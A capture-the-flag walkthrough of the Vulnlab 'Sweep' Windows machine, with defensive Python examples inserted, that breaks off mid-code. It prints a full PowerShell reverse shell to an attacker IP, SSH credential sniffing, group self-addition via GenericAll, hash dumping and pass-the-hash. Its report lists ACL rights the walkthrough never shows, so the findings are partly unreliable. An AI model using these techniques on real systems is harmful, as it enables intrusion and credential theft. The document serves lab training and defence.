Vulnlab: Sweep — Medium (Windows)

Full security assessment walkthrough for Sweep on Vulnlab. Includes reconnaissance, enumeration, exploitation steps, and a professional penetration testing report with CVSS v3.1 scores and remediation guidance.

lazyhackers
Mar 26, 2026 · 1 min read · 8 views

🔖 Techniques & Vulnerabilities

Lansweeper, Password Policy, GenericAll, Group Membership, RID Brute Forcing, SSH Credential Sniffing, XSS, sudo, BloodHound

🔍 Reconnaissance / Port Scanning

nmap scan
53/tcp   open  domain
81/tcp   open  hosts2-ns
82/tcp   open  xfer
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server
5357/tcp open  wsdapi

🎯 Attack Surface Analysis

Port       Service            Version / Banner
53/tcp     domain
81/tcp     hosts2-ns
82/tcp     xfer
88/tcp     kerberos-sec
135/tcp    msrpc
139/tcp    netbios-ssn
389/tcp    ldap
445/tcp    microsoft-ds
464/tcp    kpasswd5
593/tcp    http-rpc-epmap
636/tcp    ldapssl
3268/tcp   globalcatLDAP
3269/tcp   globalcatLDAPssl
3389/tcp   ms-wbt-server
5357/tcp   wsdapi

53/tcp (DNS)
  • Zone transfer (AXFR) reveals all DNS records if permitted
  • Subdomain brute-force to discover hidden services and admin panels
  • Reverse lookup enumeration to map IP ranges to hostnames
  • DNS cache poisoning on vulnerable resolvers
82/tcp (xfer)
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques
135/tcp (MSRPC)
  • RPC endpoint enumeration maps registered services and interfaces
  • DCOM lateral movement via Component Object Model
  • WMI remote execution with valid credentials
  • PrintSpooler (MS-RPRN) abuse coerces NTLM authentication
389/tcp (LDAP)
  • Anonymous bind — unauthenticated enumeration of all AD objects
  • Password policy retrieval for informed brute-force strategy
  • BloodHound collection for AD attack path analysis
  • LDAP injection in web applications building directory queries from user input
464/tcp (kpasswd5)
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques
636/tcp (LDAPS)
  • All LDAP attack vectors over encrypted channel
  • Client certificate authentication testing
3269/tcp (globalcatLDAPssl)
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques
5357/tcp (wsdapi)
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques

📖 Walkthrough

Reconnaissance

Port Scanning

The ports were already provided by xct.

53/tcp   open  domain
81/tcp   open  hosts2-ns
82/tcp   open  xfer
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server
5357/tcp open  wsdapi

Enumeration of Port 81/TCP

Since we didn't know what was running on port 81/TCP, we connected to it with nc. The response identified it as an HTTP service (Microsoft-HTTPAPI/2.0).

┌──(kali㉿kali)-[~]
└─$ nc 10.10.118.121 81
help
HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 29 Feb 2024 18:04:03 GMT
Connection: close
Content-Length: 326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Bad Request</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Bad Request - Invalid Verb</h2>
<hr><p>HTTP Error 400. The request verb is invalid.</p>
</BODY></HTML>

Requesting the URL with curl returned a redirect to /login.aspx.

┌──(kali㉿kali)-[~]
└─$ curl http://sweep.vl:81

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/login.aspx">here</a>.</h2>
</body></html>

SMB Enumeration

Meanwhile, we found that the Guest account was enabled, which we used to enumerate the SMB shares.

┌──(kali㉿kali)-[~]
└─$ netexec smb 10.10.118.121 -u 'Guest' -p '' --shares
SMB         10.10.118.121   445    INVENTORY        [*] Windows 10.0 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.118.121   445    INVENTORY        [+] sweep.vl\Guest: 
SMB         10.10.118.121   445    INVENTORY        [*] Enumerated shares
SMB         10.10.118.121   445    INVENTORY        Share           Permissions     Remark
SMB         10.10.118.121   445    INVENTORY        -----           -----------     ------
SMB         10.10.118.121   445    INVENTORY        ADMIN$                          Remote Admin
SMB         10.10.118.121   445    INVENTORY        C$                              Default share
SMB         10.10.118.121   445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.10.118.121   445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.10.118.121   445    INVENTORY        Lansweeper$                     Lansweeper Actions
SMB         10.10.118.121   445    INVENTORY        NETLOGON                        Logon server share 
SMB         10.10.118.121   445    INVENTORY        SYSVOL                          Logon server share

RID Brute Forcing

The readable shares contained nothing of interest, but since we could read IPC$ we used RID brute forcing to enumerate more users.

┌──(kali㉿kali)-[~]
└─$ netexec smb 10.10.118.121 -u 'Guest' -p '' --shares --rid-brute
SMB         10.10.118.121   445    INVENTORY        [*] Windows 10.0 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.118.121   445    INVENTORY        [+] sweep.vl\Guest: 
SMB         10.10.118.121   445    INVENTORY        [*] Enumerated shares
SMB         10.10.118.121   445    INVENTORY        Share           Permissions     Remark
SMB         10.10.118.121   445    INVENTORY        -----           -----------     ------
SMB         10.10.118.121   445    INVENTORY        ADMIN$                          Remote Admin
SMB         10.10.118.121   445    INVENTORY        C$                              Default share
SMB         10.10.118.121   445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.10.118.121   445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.10.118.121   445    INVENTORY        Lansweeper$                     Lansweeper Actions
SMB         10.10.118.121   445    INVENTORY        NETLOGON                        Logon server share 
SMB         10.10.118.121   445    INVENTORY        SYSVOL                          Logon server share 
SMB         10.10.118.121   445    INVENTORY        498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        500: SWEEP\Administrator (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        501: SWEEP\Guest (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        502: SWEEP\krbtgt (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        512: SWEEP\Domain Admins (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        513: SWEEP\Domain Users (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        514: SWEEP\Domain Guests (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        515: SWEEP\Domain Computers (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        516: SWEEP\Domain Controllers (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        517: SWEEP\Cert Publishers (SidTypeAlias)
SMB         10.10.118.121   445    INVENTORY        518: SWEEP\Schema Admins (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        525: SWEEP\Protected Users (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        526: SWEEP\Key Admins (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.118.121   445    INVENTORY        571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.118.121   445    INVENTORY        572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.118.121   445    INVENTORY        1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB         10.10.118.121   445    INVENTORY        1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        1113: SWEEP\jgre808 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1114: SWEEP\bcla614 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1115: SWEEP\hmar648 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1116: SWEEP\jgar931 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1117: SWEEP\fcla801 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1118: SWEEP\jwil197 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1119: SWEEP\grob171 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1120: SWEEP\fdav736 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1121: SWEEP\jsmi791 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1122: SWEEP\hjoh690 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1125: SWEEP\intern (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        3101: SWEEP\Lansweeper Discovery (SidTypeGroup)

A few accounts stood out, such as the user intern.
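To make the point of that output concrete from the defender's side (everything a Guest session can see through IPC$), here is an added parser for the netexec --rid-brute line format above. It is example code written for this page, not part of netexec, and the embedded sample is a constructed subset of the run shown here. It separates well-known RIDs (below 1000) from custom objects and lists the human and service accounts that are exposed to an unauthenticated enumeration.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample of the netexec --rid-brute output format shown above
# (a subset of the lines; the real run lists many more principals).
SAMPLE_OUTPUT = """\
SMB         10.10.118.121   445    INVENTORY        [*] Enumerated shares
SMB         10.10.118.121   445    INVENTORY        500: SWEEP\\Administrator (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        501: SWEEP\\Guest (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        512: SWEEP\\Domain Admins (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        1000: SWEEP\\INVENTORY$ (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1103: SWEEP\\Lansweeper Admins (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        1123: SWEEP\\svc_inventory_win (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1125: SWEEP\\intern (SidTypeUser)
"""

# "<proto> <ip> <port> <host> <rid>: <DOMAIN>\<name> (<SidType>)"
RID_LINE = re.compile(
    r"^\S+\s+\S+\s+\d+\s+\S+\s+(\d+): ([^\\]+)\\(.+?) \((SidType\w+)\)\s*$"
)


@dataclass(frozen=True)
class Principal:
    rid: int
    domain: str
    name: str
    sid_type: str

    @property
    def is_builtin(self) -> bool:
        # RIDs below 1000 are well-known objects created with the domain;
        # administrator-created objects start at RID 1000.
        return self.rid < 1000

    @property
    def is_machine_account(self) -> bool:
        return self.sid_type == "SidTypeUser" and self.name.endswith("$")


def parse_rid_brute(text: str) -> list[Principal]:
    """Extract every resolved RID from netexec output, skipping share listings and banners."""
    principals = []
    for line in text.splitlines():
        m = RID_LINE.match(line)
        if m:
            principals.append(Principal(int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return principals


def exposed_accounts(principals: list[Principal]) -> list[str]:
    """Custom user accounts (no built-ins, no machine accounts) visible to a Guest session."""
    return [
        p.name
        for p in principals
        if p.sid_type == "SidTypeUser" and not p.is_builtin and not p.is_machine_account
    ]


def service_accounts(principals: list[Principal], prefix: str = "svc_") -> list[str]:
    """Accounts following the naming convention for service accounts; these rarely rotate passwords."""
    return [p.name for p in principals if p.name.lower().startswith(prefix)]


if __name__ == "__main__":
    found = parse_rid_brute(SAMPLE_OUTPUT)
    print("exposed accounts:", exposed_accounts(found))
    print("service accounts:", service_accounts(found))
```

The two lists are what a reviewer should expect an attacker to have after this step; the fix on the Windows side is to disable the Guest account and stop anonymous SID lookups, not to rename users.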

Accessing Lansweeper

With the newly found username intern we tested whether the username was reused as the password.

The credentials worked when we clicked WINDOWS LOGIN on the Lansweeper login form.

Username   Password
intern     intern
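The foothold here is a password equal to the username, which is exactly the class of password a domain password filter should reject. The following added example (written for this page, not taken from Lansweeper or any product) shows the check as a standalone function: it normalizes common digit-for-letter substitutions and rejects passwords that equal, reverse or contain the username, alongside a minimum length. The threshold of 14 characters is an assumption, not a value from the page.

```python
import re

# Common substitutions people use to dodge naive "password contains username" checks.
_LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t", "@": "a", "$": "s"})


def _letters(s: str) -> str:
    """Lower-case, undo leet substitutions and keep only letters for a loose comparison."""
    return re.sub(r"[^a-z]", "", s.lower().translate(_LEET))


def username_derived(username: str, password: str) -> bool:
    """True when the password is the username or a trivial variation of it."""
    u = _letters(username)
    p = _letters(password)
    if not u:
        return False
    if p == u or p == u[::-1]:
        return True
    # Only treat containment as a hit for usernames long enough to be meaningful.
    return len(u) >= 4 and u in p


def check_password(username: str, password: str, min_length: int = 14) -> list[str]:
    """Return the list of policy violations; an empty list means the password is acceptable."""
    problems = []
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    if username_derived(username, password):
        problems.append("derived from the username")
    return problems


if __name__ == "__main__":
    for user, pw in [("intern", "intern"), ("intern", "1ntern2024!"), ("intern", "Correct-Horse-Battery-9")]:
        print(user, "->", check_password(user, pw) or "ok")
```

A check like this belongs in a password filter DLL or the identity provider's policy, where it runs at password-set time; the value is in catching the service-account pattern (svc_x with password svc_x) as well as the human one.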

While enumerating the Lansweeper interface we also found the subdomain inventory.sweep.vl, which we added to our /etc/hosts file.

┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Sweep/files]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
10.10.118.121   sweep.vl
10.10.118.121   inventory.sweep.vl

Active Directory Enumeration

Since it is always good to have something running in the background, we started collecting Active Directory data with bloodhound-python using the credentials intern:intern.

┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Sweep/files]
└─$ bloodhound-python -d 'sweep.vl' -dc 'inventory.sweep.vl' -u 'intern' -p 'intern' -ns 10.10.118.121 -c all --zip
INFO: Found AD domain: sweep.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 17 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: inventory.sweep.vl
INFO: Done in 00M 06S
INFO: Compressing output into 20240229140240_bloodhound.zip

For testing purposes, and hoping for better visibility, I also ran AD Miner over the collected data.

┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Sweep/files]
└─$  AD-miner -u <USERNAME> -p <PASSWORD> -cf Sweep
[+]Group : 54 | User : 17 | Container : 19 | Domain : 1 | OU : 3 | GPO : 2 | Computer : 1 | Relations : 816
[1/145] [+]Requesting : Checking if Graph Data Science neo4j plugin is installed
[+]GDS plugin not installed.
[+]Not using exploitability for paths computation.

We discovered a few interesting things but nothing useful in the end.

Foothold

Back on the Lansweeper dashboard we created a new scanning target (an IP Range) and pointed it at our own machine.

For the next step we mapped the stored svc_inventory_lnx credentials to the newly created IP Range object, so that the scanner would use them against every host in that range.

SSH Credential Sniffing

First I tried to set up ssh-mitm but I had quite a few issues with it, so I switched to fakessh, which had worked for a few other people from our team.

┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Sweep/files]
└─$ go install github.com/fffaraz/fakessh@latest
go: downloading github.com/fffaraz/fakessh v0.0.1
go: downloading golang.org/x/crypto v0.18.0

According to the documentation the binary requires the cap_net_bind_service=+ep capability, so that it can bind port 22 without running as root.

┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Sweep/files]
└─$ sudo setcap 'cap_net_bind_service=+ep' ~/go/bin/fakessh
[sudo] password for kali:

After setting that up we started a new scan of our IP Range and, to our surprise, received the cleartext credentials of the user svc_inventory_lnx: the scanner authenticated to our listener and sent the password.

┌──(kali㉿kali)-[~/go/bin]
└─$ ./fakessh 
2024/02/29 15:45:38.879438 10.10.118.121:54123
2024/02/29 15:45:41.884270 10.10.118.121:54133
2024/02/29 15:45:41.975583 10.10.118.121:54134
2024/02/29 15:45:42.081123 10.10.118.121:54134 SSH-2.0-RebexSSH_5.0.8372.0 svc_inventory_lnx [REDACTED]

Username            Password
svc_inventory_lnx   [REDACTED]
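The password leaked because the scanner was willing to authenticate to a host it had never seen. A client that refuses unknown or changed host keys, instead of trusting them on first use, never reaches the password step against a rogue listener. The following added example (written for this page; it is not code from Lansweeper, Rebex or fakessh) shows that client-side check: it computes the OpenSSH-style SHA256 fingerprint of a presented host key blob and compares it against a fingerprint pinned out of band. The host address 192.0.2.10 and the key bytes are constructed, not real keys.

```python
import base64
import hashlib
import struct


def ssh_string(b: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def make_ed25519_blob(raw32: bytes) -> bytes:
    """Public key blob as it appears (base64-decoded) in known_hosts: string "ssh-ed25519" || string key."""
    assert len(raw32) == 32
    return ssh_string(b"ssh-ed25519") + ssh_string(raw32)


def fingerprint(blob: bytes) -> str:
    """OpenSSH-style fingerprint: 'SHA256:' + base64(sha256(blob)) with the '=' padding stripped."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


class HostKeyMismatch(Exception):
    pass


# Constructed pinned host keys (NOT real keys): "host:port" -> fingerprint.
# In practice this table comes from a known_hosts file that is populated out of band.
_LEGIT_KEY = make_ed25519_blob(bytes(range(32)))
PINNED = {"192.0.2.10:22": fingerprint(_LEGIT_KEY)}


def verify_host_key(host: str, port: int, presented_blob: bytes, pinned=PINNED) -> bool:
    """Accept only a host key that matches the pinned fingerprint.

    Unknown hosts are refused rather than auto-added: a scanner that auto-accepts
    will complete authentication (and so reveal its password) to any listener
    placed inside its scan range.
    """
    key = f"{host}:{port}"
    fp = fingerprint(presented_blob)
    if key not in pinned:
        raise HostKeyMismatch(f"no pinned key for {key} (presented {fp}); refusing to authenticate")
    if fp != pinned[key]:
        raise HostKeyMismatch(f"host key for {key} changed: expected {pinned[key]}, got {fp}")
    return True


if __name__ == "__main__":
    print("legit:", verify_host_key("192.0.2.10", 22, _LEGIT_KEY))
    rogue = make_ed25519_blob(bytes([0xAA] * 32))
    try:
        verify_host_key("192.0.2.10", 22, rogue)
    except HostKeyMismatch as e:
        print("rejected:", e)
```

Pinning only protects the SSH leg; the broader lesson of this step is that a scanning credential is exposed to every address in the range it is configured for, so the range itself, and who may edit it, deserves the same review as the credential.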

Enable Remote Access

By checking its details in BloodHound we determined that svc_inventory_lnx was a service account without remote access, which meant we had to enable remote access for it before we could log in using WinRM.

We checked the groups the account was a member of. It showed that svc_inventory_lnx was a member of LANSWEEPER DISCOVERY, which had GenericAll privileges on LANSWEEPER ADMINS.

Updating Group Memberships

Using the pth-toolkit we added the service account svc_inventory_lnx to the LANSWEEPER ADMINS group. BloodHound describes the resulting CanPSRemote edge as follows:

The members of the group LANSWEEPER ADMINS@SWEEP.VL have the capability to create a PSRemote Connection with the computer INVENTORY.SWEEP.VL.

PS Session access allows you to enter an interactive session with the target computer. If authenticating as a low privilege user, a privilege escalation may allow you to gain high privileges on the system.

Note: This edge does not guarantee privileged execution.

┌──(kali㉿kali)-[~]
└─$ pth-net rpc group addmem "LANSWEEPER ADMINS" svc_inventory_lnx -U sweep.vl/svc_inventory_lnx -S 10.10.118.121
Password for [SWEEP.VL\svc_inventory_lnx]:
E_md4hash wrapper called.

This enabled Remote Access on the box for us.
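From the defender's side, the step above leaves a very specific trace: a Security log event for a member being added to a global group (Event ID 4728; 4732 and 4756 are the local and universal group equivalents), where the account performing the change is the same account being added. The following added detection logic (written for this page, not taken from any product or SIEM) evaluates such events and raises a high-severity alert on a self-grant or on any addition to a watched group. The event records are constructed to mirror this walkthrough; the DNs and the field subset are assumptions about the real 4728 payload.

```python
from __future__ import annotations

from dataclasses import dataclass

# "A member was added to a security-enabled <scope> group".
GROUP_ADD_EVENTS = {4728: "global", 4732: "local", 4756: "universal"}

# Groups whose membership changes should always be reviewed (case-insensitive match).
WATCHED_GROUPS = {
    "DOMAIN ADMINS", "ENTERPRISE ADMINS", "SCHEMA ADMINS", "ADMINISTRATORS",
    "LANSWEEPER ADMINS",  # grants PSRemote to the DC in this environment
}


@dataclass
class Alert:
    severity: str
    reason: str
    event: dict


def _cn_from_dn(dn: str) -> str:
    """'CN=svc_inventory_lnx,CN=Users,DC=sweep,DC=vl' -> 'svc_inventory_lnx'."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def evaluate(event: dict) -> Alert | None:
    """Classify one Security event; returns None for event IDs we do not care about."""
    if event.get("EventID") not in GROUP_ADD_EVENTS:
        return None
    group = event["TargetUserName"]
    member = _cn_from_dn(event["MemberName"])
    actor = event["SubjectUserName"]
    # An account adding itself to a group is the signature of ACL abuse
    # (GenericAll / WriteProperty on the group), regardless of which group it is.
    if member.lower() == actor.lower():
        return Alert("high", f"{actor} added itself to {group} (self-grant via ACL rights)", event)
    if group.upper() in WATCHED_GROUPS:
        return Alert("high", f"{actor} added {member} to watched group {group}", event)
    return Alert("info", f"{actor} added {member} to {group}", event)


def scan(events: list[dict]) -> list[Alert]:
    return [a for a in map(evaluate, events) if a is not None]


# Constructed sample events (field subset of the real 4728 payload).
SAMPLE_EVENTS = [
    {"EventID": 4624, "SubjectUserName": "svc_inventory_lnx"},  # a logon; ignored
    {"EventID": 4728, "SubjectUserName": "svc_inventory_lnx", "SubjectDomainName": "SWEEP",
     "MemberName": "CN=svc_inventory_lnx,CN=Users,DC=sweep,DC=vl",
     "TargetUserName": "Lansweeper Admins", "TargetDomainName": "SWEEP"},
    {"EventID": 4728, "SubjectUserName": "Administrator", "SubjectDomainName": "SWEEP",
     "MemberName": "CN=jgre808,CN=Users,DC=sweep,DC=vl",
     "TargetUserName": "Lansweeper Discovery", "TargetDomainName": "SWEEP"},
    {"EventID": 4728, "SubjectUserName": "Administrator", "SubjectDomainName": "SWEEP",
     "MemberName": "CN=bcla614,CN=Users,DC=sweep,DC=vl",
     "TargetUserName": "Domain Admins", "TargetDomainName": "SWEEP"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert.severity}] {alert.reason}")
```

The self-grant rule is the one worth keeping even when the watched-group list is incomplete: legitimate administration almost never has the subject and the member of a 4728 be the same principal.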

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i sweep.vl -u 'svc_inventory_lnx' -p 'REDACTED' 

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_inventory_lnx\Documents>

user.txt

*Evil-WinRM* PS C:\> type user.txt
VL{REDACTED}

Privilege Escalation

We revisited the Lansweeper login form and this time logged in as svc_inventory_lnx on inventory.sweep.vl.

Checking the permissions showed the capability to Access Deployment and again Access Scanning Credentials.

We created a new credential mapping and this time as Windows Computer for sweep\inventory on Inventory Windows.

After that we created a test deployment package whose Action executed a command we controlled. As payload we used PowerShell #2 from revshells.com.

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.8.1.142',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

We selected an Asset.

And chose INVENTORY as target.

After firing up the scan we got our shell.

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.8.1.142] from (UNKNOWN) [10.10.118.121] 54847

PS C:\Windows\system32> whoami
nt authority\system

root.txt

PS C:\Users\Administrator\Desktop> type root.txt
VL{REDACTED}

Post Exploitation

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
jgre808:1113:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
bcla614:1114:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
hmar648:1115:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
jgar931:1116:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
fcla801:1117:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
jwil197:1118:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
grob171:1119:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
fdav736:1120:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
jsmi791:1121:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
hjoh690:1122:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
svc_inventory_win:1123:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
svc_inventory_lnx:1124:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
intern:1125:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
INVENTORY$:1000:aad3b435b51404eeaad3b435b51404ee:REDACTED:::

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i sweep.vl -u 'administrator' -H REDACTED    

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

📋 Security Assessment Report

Summary: 0 Critical, 2 High, 1 Medium, 8 Open Ports

F-001 — Active Directory ACL Abuse — Indirect Domain Escalation
Severity: High (CVSS 8.8)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that BloodHound analysis of the Active Directory environment revealed exploitable ACL attack paths connecting low-privilege user accounts to privileged domain objects. Permissions including GenericAll, WriteDACL, ForceChangePassword, and GenericWrite were identified on critical objects, forming a chain to Domain Admin access without exploiting any software vulnerability.

Impact

An attacker with initial access to any domain user account along the identified path can chain misconfigured permissions to progressively escalate privileges and reach Domain Admin. This attack requires no software CVE exploitation, making it invisible to traditional vulnerability scanners. The complete attack path was traversed during this engagement from a standard domain user account to full domain administrator access.

Confidentiality: High | Integrity: High | Availability: High

Remediation

Conduct a full BloodHound audit and remediate all shortest paths to Domain Admin and other Tier-0 assets. Remove unnecessary permissions granted to regular user accounts on privileged objects. Implement an Active Directory tiering model (Tier 0: DCs and admin accounts, Tier 1: servers, Tier 2: workstations) with strict boundaries. Enable Protected Users security group for all Tier-0 accounts. Review and tighten ACLs on all AdminSDHolder-protected objects.
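The first remediation step, a BloodHound audit of rights on privileged groups, can be scripted against the collector's own JSON output rather than done by hand in the graph UI. The following added example (written for this page, not part of BloodHound or bloodhound-python) walks the Aces array of each entry in groups.json, keeps the rights that allow taking over the target, drops principals that are expected to hold them, and lists the rest with high-value targets first. The embedded data is constructed in the shape of bloodhound-python's groups.json with made-up SIDs; the GenericAll edge from LANSWEEPER DISCOVERY to LANSWEEPER ADMINS mirrors this box, while the WriteDacl entry on DOMAIN ADMINS is a hypothetical addition to show the sorting and the SID fallback when users.json is not loaded.

```python
import json

# Rights that let the holder control the target object's membership or ACL outright.
DANGEROUS_RIGHTS = {
    "GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "Owns",
    "AddMember", "AllExtendedRights", "ForceChangePassword",
}

# Principals that are expected to hold such rights on privileged groups (assumed Tier-0 set).
TRUSTED_PRINCIPALS = {
    "DOMAIN ADMINS@SWEEP.VL", "ENTERPRISE ADMINS@SWEEP.VL", "ADMINISTRATORS@SWEEP.VL",
}

# Constructed data in the shape of bloodhound-python's groups.json (trimmed to the
# fields used here; SIDs are made up).
GROUPS_JSON = json.dumps({"data": [
    {"ObjectIdentifier": "S-1-5-21-1-2-3-1103",
     "Properties": {"name": "LANSWEEPER ADMINS@SWEEP.VL", "highvalue": False},
     "Aces": [
         {"PrincipalSID": "S-1-5-21-1-2-3-3101", "PrincipalType": "Group",
          "RightName": "GenericAll", "IsInherited": False},
         {"PrincipalSID": "S-1-5-21-1-2-3-512", "PrincipalType": "Group",
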